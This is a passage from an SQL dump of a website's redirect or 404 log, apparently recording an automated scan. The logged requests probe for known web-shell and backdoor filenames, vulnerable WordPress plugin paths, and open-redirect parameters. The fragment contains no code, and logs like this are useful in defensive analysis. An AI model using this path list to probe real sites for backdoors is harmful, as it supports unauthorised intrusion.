00:00:00',301),(53783,'http://3s-technologies.com.tr/en/wp-admin/network/classwithtostring.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:34:54','0000-00-00 00:00:00',301),(53784,'http://3s-technologies.com.tr/en/wp-admin/user/classwithtostring.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:34:55','0000-00-00 00:00:00',301),(53785,'http://3s-technologies.com.tr/en/wp-content/uploads/classwithtostring.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:34:57','0000-00-00 00:00:00',301),(53786,'http://3s-technologies.com.tr/en/wp-content/plugins/classwithtostring.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:34:58','0000-00-00 00:00:00',301),(53787,'http://3s-technologies.com.tr/en/wp-content/languages/classwithtostring.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:34:59','0000-00-00 00:00:00',301),(53788,'http://3s-technologies.com.tr/en/wp-content/languages/themes/classwithtostring.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:35:00','0000-00-00 00:00:00',301),(53789,'http://3s-technologies.com.tr/en/wp-includes/simplepie/classwithtostring.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:35:00','0000-00-00 00:00:00',301),(53790,'http://3s-technologies.com.tr/en/wp-includes/certificates/classwithtostring.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:35:01','0000-00-00 00:00:00',301),(53791,'http://3s-technologies.com.tr/en/wp-includes/customize/classwithtostring.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:35:02','0000-00-00 00:00:00',301),(53792,'http://3s-technologies.com.tr/en/wp-includes/pomo/classwithtostring.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:35:03','0000-00-00 00:00:00',301),(53793,'http://3s-technologies.com.tr/en/wp-includes/rest-api/classwithtostring.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:35:04','0000-00-00 00:00:00',301),(53794,'http://3s-technologies.com.tr/en/index/classwithtostring.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:35:04','0000-00-00 00:00:00',301),(53795,'http://3s-technologies.com.tr/en/about/classwithtostring.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:35:05','0000-00-00 00:00:00',301),(53796,'http://3s-technologies.com.tr/en/as/classwithtostring.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:35:06','0000-00-00 00:00:00',301),(53797,'http://3s-technologies.com.tr/en/file/classwithtostring.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:35:07','0000-00-00 00:00:00',301),(53798,'http://3s-technologies.com.tr/en/chosen/classwithtostring.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:35:08','0000-00-00 00:00:00',301),(53799,'http://3s-technologies.com.tr/en/css/classwithtostring.php',NULL,'https://www.google.com/','',14,0,'2025-12-20 05:35:09','0000-00-00 00:00:00',301),(53800,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/classwithtostring.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:35:10','0000-00-00 00:00:00',301),(53801,'http://3s-technologies.com.tr/en/wp-includes/text/diff/gethostbyname.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:35:10','0000-00-00 00:00:00',301),(53802,'http://3s-technologies.com.tr/en/nappe-plastique.com/media-upload.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:35:11','0000-00-00 00:00:00',301),(53803,'http://3s-technologies.com.tr/en/customize.php',NULL,'https://www.yahoo.com/','',3,0,'2025-12-20 05:35:12','0000-00-00 00:00:00',301),(53804,'http://3s-technologies.com.tr/en/wp-admin/images/admin-ajax.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:35:14','0000-00-00 00:00:00',301),(53805,'http://3s-technologies.com.tr/en/wp-admin/includes/admin-ajax.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:35:15','0000-00-00 00:00:00',301),(53806,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/admin-ajax.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:35:16','0000-00-00 00:00:00',301),(53807,'http://3s-technologies.com.tr/en/wp-admin/js/admin-ajax.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:35:17','0000-00-00 00:00:00',301),(53808,'http://3s-technologies.com.tr/en/wp-admin/maint/admin-ajax.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:35:17','0000-00-00 00:00:00',301),(53809,'http://3s-technologies.com.tr/en/wp-admin/network/admin-ajax.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:35:18','0000-00-00 00:00:00',301),(53810,'http://3s-technologies.com.tr/en/wp-admin/user/admin-ajax.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:35:19','0000-00-00 00:00:00',301),(53811,'http://3s-technologies.com.tr/en/wp-content/admin-ajax.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:35:20','0000-00-00 00:00:00',301),(53812,'http://3s-technologies.com.tr/en/wp-content/uploads/admin-ajax.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:35:21','0000-00-00 00:00:00',301),(53813,'http://3s-technologies.com.tr/en/wp-content/plugins/admin-ajax.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:35:22','0000-00-00 00:00:00',301),(53814,'http://3s-technologies.com.tr/en/wp-content/languages/admin-ajax.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:35:23','0000-00-00 00:00:00',301),(53815,'http://3s-technologies.com.tr/en/wp-content/languages/themes/admin-ajax.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:35:24','0000-00-00 00:00:00',301),(53816,'http://3s-technologies.com.tr/en/wp-includes/simplepie/admin-ajax.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:35:24','0000-00-00 00:00:00',301),(53817,'http://3s-technologies.com.tr/en/wp-includes/certificates/admin-ajax.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:35:25','0000-00-00 00:00:00',301),(53818,'http://3s-technologies.com.tr/en/wp-includes/customize/admin-ajax.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:35:26','0000-00-00 00:00:00',301),(53819,'http://3s-technologies.com.tr/en/wp-includes/pomo/admin-ajax.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:35:27','0000-00-00 00:00:00',301),(53820,'http://3s-technologies.com.tr/en/wp-includes/rest-api/admin-ajax.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:35:28','0000-00-00 00:00:00',301),(53821,'http://3s-technologies.com.tr/en/wp-content/plugins/hellopress/admin-ajax.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:35:29','0000-00-00 00:00:00',301),(53822,'http://3s-technologies.com.tr/en/index/admin-ajax.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:35:29','0000-00-00 00:00:00',301),(53823,'http://3s-technologies.com.tr/en/about/admin-ajax.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:35:30','0000-00-00 00:00:00',301),(53824,'http://3s-technologies.com.tr/en/as/admin-ajax.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:35:31','0000-00-00 00:00:00',301),(53825,'http://3s-technologies.com.tr/en/file/admin-ajax.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:35:32','0000-00-00 00:00:00',301),(53826,'http://3s-technologies.com.tr/en/chosen/admin-ajax.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:35:33','0000-00-00 00:00:00',301),(53827,'http://3s-technologies.com.tr/en/css/admin-ajax.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:35:34','0000-00-00 00:00:00',301),(53828,'http://3s-technologies.com.tr/en/wp-admin/css/colors/blue/admin-ajax.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:35:34','0000-00-00 00:00:00',301),(53829,'http://3s-technologies.com.tr/en/email_v2/js/tiny_mce/plugins/ajaxfilemanager/admin-ajax.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:35:35','0000-00-00 00:00:00',301),(53830,'http://3s-technologies.com.tr/en/jscript/tiny_mce/plugins/ajaxfilemanager/admin-ajax.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:35:36','0000-00-00 00:00:00',301),(53831,'http://3s-technologies.com.tr/en/js/tiny_mce/plugins/ajaxfilemanager/admin-ajax.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:35:37','0000-00-00 00:00:00',301),(53832,'http://3s-technologies.com.tr/en/tiny_mce/plugins/ajaxfilemanager/admin-ajax.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:35:38','0000-00-00 00:00:00',301),(53833,'http://3s-technologies.com.tr/en/plugins/ajaxfilemanager/admin-ajax.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:35:38','0000-00-00 00:00:00',301),(53834,'http://3s-technologies.com.tr/en/ajaxfilemanager/admin-ajax.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:35:39','0000-00-00 00:00:00',301),(53835,'http://3s-technologies.com.tr/en/cms/tiny_mce/plugins/ajaxfilemanager/admin-ajax.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:35:40','0000-00-00 00:00:00',301),(53836,'http://3s-technologies.com.tr/en/link-manager.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:35:41','0000-00-00 00:00:00',301),(53837,'http://3s-technologies.com.tr/en/wp-content/plugins/ioxi/alfa-ioxi.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:35:42','0000-00-00 00:00:00',301),(53838,'http://3s-technologies.com.tr/en/media.php',NULL,'https://www.google.de/','',3,0,'2025-12-20 05:35:45','0000-00-00 00:00:00',301),(53839,'http://3s-technologies.com.tr/en/memberfuns.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:35:46','0000-00-00 00:00:00',301),(53840,'http://3s-technologies.com.tr/en/ms-upgrade-network.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:35:48','0000-00-00 00:00:00',301),(53841,'http://3s-technologies.com.tr/en/ms-sites.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:35:49','0000-00-00 00:00:00',301),(53842,'http://3s-technologies.com.tr/en/options-head.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:35:50','0000-00-00 00:00:00',301),(53843,'http://3s-technologies.com.tr/en/edit-comments.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:35:51','0000-00-00 00:00:00',301),(53844,'http://3s-technologies.com.tr/en/moderation.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:35:52','0000-00-00 00:00:00',301),(53845,'http://3s-technologies.com.tr/en/dwbqa.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:35:53','0000-00-00 00:00:00',301),(53846,'http://3s-technologies.com.tr/en/xphyj.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:35:54','0000-00-00 00:00:00',301),(53847,'http://3s-technologies.com.tr/en/media-upload.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:35:54','0000-00-00 00:00:00',301),(53848,'http://3s-technologies.com.tr/en/ffkwm.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:35:55','0000-00-00 00:00:00',301),(53849,'http://3s-technologies.com.tr/en/options-permalink.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:35:57','0000-00-00 00:00:00',301),(53850,'http://3s-technologies.com.tr/en/post-new.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:35:58','0000-00-00 00:00:00',301),(53851,'http://3s-technologies.com.tr/en/ms-options.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:35:59','0000-00-00 00:00:00',301),(53852,'http://3s-technologies.com.tr/en/edit-link-form.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:36:00','0000-00-00 00:00:00',301),(53853,'http://3s-technologies.com.tr/en/plugin-editor.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:36:01','0000-00-00 00:00:00',301),(53854,'http://3s-technologies.com.tr/en/edit-tags.php',NULL,'https://www.google.fr/','',5,0,'2025-12-20 05:36:02','0000-00-00 00:00:00',301),(53855,'http://3s-technologies.com.tr/en/load-styles.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:36:02','0000-00-00 00:00:00',301),(53856,'http://3s-technologies.com.tr/en/setup-config.php',NULL,'https://duckduckgo.com/','',3,0,'2025-12-20 05:36:03','0000-00-00 00:00:00',301),(53857,'http://3s-technologies.com.tr/en/doiconvs.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:36:04','0000-00-00 00:00:00',301),(53858,'http://3s-technologies.com.tr/en/menu-header.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:36:05','0000-00-00 00:00:00',301),(53859,'http://3s-technologies.com.tr/en/link-parse-opml.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:36:06','0000-00-00 00:00:00',301),(53860,'http://3s-technologies.com.tr/en/onclickfuns.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:36:07','0000-00-00 00:00:00',301),(53861,'http://3s-technologies.com.tr/en/options.php',NULL,'https://www.google.de/','',6,0,'2025-12-20 05:36:08','0000-00-00 00:00:00',301),(53862,'http://3s-technologies.com.tr/en/load-scripts.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:36:10','0000-00-00 00:00:00',301),(53863,'http://3s-technologies.com.tr/en/custom-background.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:36:11','0000-00-00 00:00:00',301),(53864,'http://3s-technologies.com.tr/en/fw.php/wp-content/themes/finley/min.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:36:12','0000-00-00 00:00:00',301),(53865,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/wp-content/themes/finley/min.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:36:13','0000-00-00 00:00:00',301),(53866,'http://3s-technologies.com.tr/en/ws.php/wp-content/themes/finley/min.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:36:14','0000-00-00 00:00:00',301),(53867,'http://3s-technologies.com.tr/en/.well-known/acme-challenge/cloud.php/wp-content/themes/finley/min.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:36:15','0000-00-00 00:00:00',301),(53868,'http://3s-technologies.com.tr/en/4pric.php/wp-content/themes/finley/min.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:36:16','0000-00-00 00:00:00',301),(53869,'http://3s-technologies.com.tr/en/wp-content/themes/finley/min.php/wp-content/themes/finley/min.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:36:17','0000-00-00 00:00:00',301),(53870,'http://3s-technologies.com.tr/en/wp-admin/css/index.php/wp-content/themes/finley/min.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:36:18','0000-00-00 00:00:00',301),(53871,'http://3s-technologies.com.tr/en/wp-content/themes/twenty/twenty.php/wp-content/themes/finley/min.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:36:18','0000-00-00 00:00:00',301),(53872,'http://3s-technologies.com.tr/en/x4.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:36:19','0000-00-00 00:00:00',301),(53873,'http://3s-technologies.com.tr/en/api/kfile/index.php?user/login',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:36:20','0000-00-00 00:00:00',301),(53874,'http://3s-technologies.com.tr/en/file/index.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:36:21','0000-00-00 00:00:00',301),(53875,'http://3s-technologies.com.tr/en/chosen/index.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:36:23','0000-00-00 00:00:00',301),(53876,'http://3s-technologies.com.tr/en/kod/index.php?user/login',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:36:25','0000-00-00 00:00:00',301),(53877,'http://3s-technologies.com.tr/en/open_is_url.php?url=http:/golem.com',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:36:26','0000-00-00 00:00:00',301),(53878,'http://3s-technologies.com.tr/en/redirect.php?url=http:/golem.com',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:36:26','0000-00-00 00:00:00',301),(53879,'http://3s-technologies.com.tr/en/skipper.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:36:35','0000-00-00 00:00:00',301),(53880,'http://3s-technologies.com.tr/en/skippershell.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:36:36','0000-00-00 00:00:00',301),(53881,'http://3s-technologies.com.tr/en/inje3ctor.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:36:39','0000-00-00 00:00:00',301),(53882,'http://3s-technologies.com.tr/en/cmd13.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:36:44','0000-00-00 00:00:00',301),(53883,'http://3s-technologies.com.tr/en/inc20k1.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:36:44','0000-00-00 00:00:00',301),(53884,'http://3s-technologies.com.tr/en/toor.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:36:46','0000-00-00 00:00:00',301),(53885,'http://3s-technologies.com.tr/en/bot.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:36:47','0000-00-00 00:00:00',301),(53886,'http://3s-technologies.com.tr/en/php_sender.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:36:48','0000-00-00 00:00:00',301),(53887,'http://3s-technologies.com.tr/en/phpsender.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:36:49','0000-00-00 00:00:00',301),(53888,'http://3s-technologies.com.tr/en/smtp.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:36:50','0000-00-00 00:00:00',301),(53889,'http://3s-technologies.com.tr/en/wp-content/plugins/zaen/includes/loadme.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:36:55','0000-00-00 00:00:00',301),(53890,'http://3s-technologies.com.tr/en/wpvitamins.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:37:00','0000-00-00 00:00:00',301),(53891,'http://3s-technologies.com.tr/en/wordpress/fw.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:37:01','0000-00-00 00:00:00',301),(53892,'http://3s-technologies.com.tr/en/wp-admin/f0x.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:37:02','0000-00-00 00:00:00',301),(53893,'http://3s-technologies.com.tr/en/wp-includes/f0x.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:37:04','0000-00-00 00:00:00',301),(53894,'http://3s-technologies.com.tr/en/alfanibos.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:37:08','0000-00-00 00:00:00',301),(53895,'http://3s-technologies.com.tr/en/wikiindex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:37:11','0000-00-00 00:00:00',301),(53896,'http://3s-technologies.com.tr/en/bulle.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:37:14','0000-00-00 00:00:00',301),(53897,'http://3s-technologies.com.tr/en/upl.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:37:23','0000-00-00 00:00:00',301),(53898,'http://3s-technologies.com.tr/en/yo.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:37:27','0000-00-00 00:00:00',301),(53899,'http://3s-technologies.com.tr/en/wp-content/fm.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:37:27','0000-00-00 00:00:00',301),(53900,'http://3s-technologies.com.tr/en/images/shell.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:37:28','0000-00-00 00:00:00',301),(53901,'http://3s-technologies.com.tr/en/images/fw.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:37:32','0000-00-00 00:00:00',301),(53902,'http://3s-technologies.com.tr/en/images/alfa.php',NULL,'https://www.yahoo.com/','',9,0,'2025-12-20 05:37:33','0000-00-00 00:00:00',301),(53903,'http://3s-technologies.com.tr/en/images/byps.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:37:35','0000-00-00 00:00:00',301),(53904,'http://3s-technologies.com.tr/en/images/lux.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:37:37','0000-00-00 00:00:00',301),(53905,'http://3s-technologies.com.tr/en/alfi.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:37:38','0000-00-00 00:00:00',301),(53906,'http://3s-technologies.com.tr/en/dc.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:37:39','0000-00-00 00:00:00',301),(53907,'http://3s-technologies.com.tr/en/wp-content/uploads/simple-file-list/dc.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:37:40','0000-00-00 00:00:00',301),(53908,'http://3s-technologies.com.tr/en/wp-content/uploads/simple-file-list/shell.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:37:41','0000-00-00 00:00:00',301),(53909,'http://3s-technologies.com.tr/en/wp-content/uploads/simple-file-list/fox.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:37:42','0000-00-00 00:00:00',301),(53910,'http://3s-technologies.com.tr/en/wp-content/uploads/simple-file-list/fw.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:37:43','0000-00-00 00:00:00',301),(53911,'http://3s-technologies.com.tr/en/wp-incleude.php/fpebr.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:37:46','0000-00-00 00:00:00',301),(53912,'http://3s-technologies.com.tr/en/snd21.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:37:47','0000-00-00 00:00:00',301),(53913,'http://3s-technologies.com.tr/en/ice.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:37:47','0000-00-00 00:00:00',301),(53914,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee',NULL,'https://www.google.com/','',21,0,'2025-12-20 05:37:51','0000-00-00 00:00:00',301),(53915,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/a.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:37:56','0000-00-00 00:00:00',301),(53916,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/alfawso.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:37:58','0000-00-00 00:00:00',301),(53917,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/haxor.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:37:59','0000-00-00 00:00:00',301),(53918,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/up.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:38:01','0000-00-00 00:00:00',301),(53919,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/sh3ll.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:38:04','0000-00-00 00:00:00',301),(53920,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/black.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:38:06','0000-00-00 00:00:00',301),(53921,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/symlink.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:38:08','0000-00-00 00:00:00',301),(53922,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/tesla1.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:38:10','0000-00-00 00:00:00',301),(53923,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/image.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:38:11','0000-00-00 00:00:00',301),(53924,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/bulle.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:38:18','0000-00-00 00:00:00',301),(53925,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/mailer.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:38:18','0000-00-00 00:00:00',301),(53926,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/x.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:38:19','0000-00-00 00:00:00',301),(53927,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/am.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:38:20','0000-00-00 00:00:00',301),(53928,'http://3s-technologies.com.tr/en/wp-admin/css/colors/coffee/fox.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:38:22','0000-00-00 00:00:00',301),(53929,'http://3s-technologies.com.tr/en/alfawso.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:38:23','0000-00-00 00:00:00',301),(53930,'http://3s-technologies.com.tr/en/alf4.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:38:24','0000-00-00 00:00:00',301),(53931,'http://3s-technologies.com.tr/en/pop.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:38:25','0000-00-00 00:00:00',301),(53932,'http://3s-technologies.com.tr/en/wp-thesex.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:38:26','0000-00-00 00:00:00',301),(53933,'http://3s-technologies.com.tr/en/wp-admin/includes/wso.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:38:27','0000-00-00 00:00:00',301),(53934,'http://3s-technologies.com.tr/en/fox1.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:38:29','0000-00-00 00:00:00',301),(53935,'http://3s-technologies.com.tr/en/yhr.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:38:30','0000-00-00 00:00:00',301),(53936,'http://3s-technologies.com.tr/en/wp-admin/css/wso.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:38:30','0000-00-00 00:00:00',301),(53937,'http://3s-technologies.com.tr/en/wp-admin/includes/mailer.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:38:31','0000-00-00 00:00:00',301),(53938,'http://3s-technologies.com.tr/en/wp-admin/maint/mailer.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:38:32','0000-00-00 00:00:00',301),(53939,'http://3s-technologies.com.tr/en/wp-includes/css/mailer.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:38:35','0000-00-00 00:00:00',301),(53940,'http://3s-technologies.com.tr/en/ym.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:38:36','0000-00-00 00:00:00',301),(53941,'http://3s-technologies.com.tr/en/1945.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:38:37','0000-00-00 00:00:00',301),(53942,'http://3s-technologies.com.tr/en/yyyy.php',NULL,'https://duckduckgo.com/','',2,0,'2025-12-20 05:38:38','0000-00-00 00:00:00',301),(53943,'http://3s-technologies.com.tr/en/159.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:38:39','0000-00-00 00:00:00',301),(53944,'http://3s-technologies.com.tr/en/tesla1.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:38:40','0000-00-00 00:00:00',301),(53945,'http://3s-technologies.com.tr/en/shadowx.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:38:41','0000-00-00 00:00:00',301),(53946,'http://3s-technologies.com.tr/en/wp-content/plugins/watch/byp.php?p=',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:38:50','0000-00-00 00:00:00',301),(53947,'http://3s-technologies.com.tr/en/wp-admin/images/indexx.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:38:56','0000-00-00 00:00:00',301),(53948,'http://3s-technologies.com.tr/en/wp-admin/includes/indexx.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:38:56','0000-00-00 00:00:00',301),(53949,'http://3s-technologies.com.tr/en/wp-admin/js/widgets/indexx.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:38:58','0000-00-00 00:00:00',301),(53950,'http://3s-technologies.com.tr/en/wp-admin/js/indexx.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:38:58','0000-00-00 00:00:00',301),(53951,'http://3s-technologies.com.tr/en/wp-admin/maint/indexx.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:38:59','0000-00-00 00:00:00',301),(53952,'http://3s-technologies.com.tr/en/wp-admin/network/indexx.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:39:00','0000-00-00 00:00:00',301),(53953,'http://3s-technologies.com.tr/en/wp-admin/user/indexx.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:39:01','0000-00-00 00:00:00',301),(53954,'http://3s-technologies.com.tr/en/wp-content/indexx.php',NULL,'https://www.yahoo.com/','',2,0,'2025-12-20 05:39:02','0000-00-00 00:00:00',301),(53955,'http://3s-technologies.com.tr/en/wp-content/uploads/indexx.php',NULL,'https://www.google.co.uk/','',2,0,'2025-12-20 05:39:03','0000-00-00 00:00:00',301),(53956,'http://3s-technologies.com.tr/en/wp-content/plugins/indexx.php',NULL,'https://www.bing.com/','',2,0,'2025-12-20 05:39:03','0000-00-00 00:00:00',301),(53957,'http://3s-technologies.com.tr/en/wp-content/languages/indexx.php',NULL,'https://www.google.com/','',2,0,'2025-12-20 05:39:04','0000-00-00 00:00:00',301),(53958,'http://3s-technologies.com.tr/en/wp-content/languages/themes/indexx.php',NULL,'https://www.google.de/','',2,0,'2025-12-20 05:39:05','0000-00-00 00:00:00',301),(53959,'http://3s-technologies.com.tr/en/wp-includes/simplepie/indexx.php',NULL,'https://www.google.fr/','',2,0,'2025-12-20 05:39:06','0000-00-00 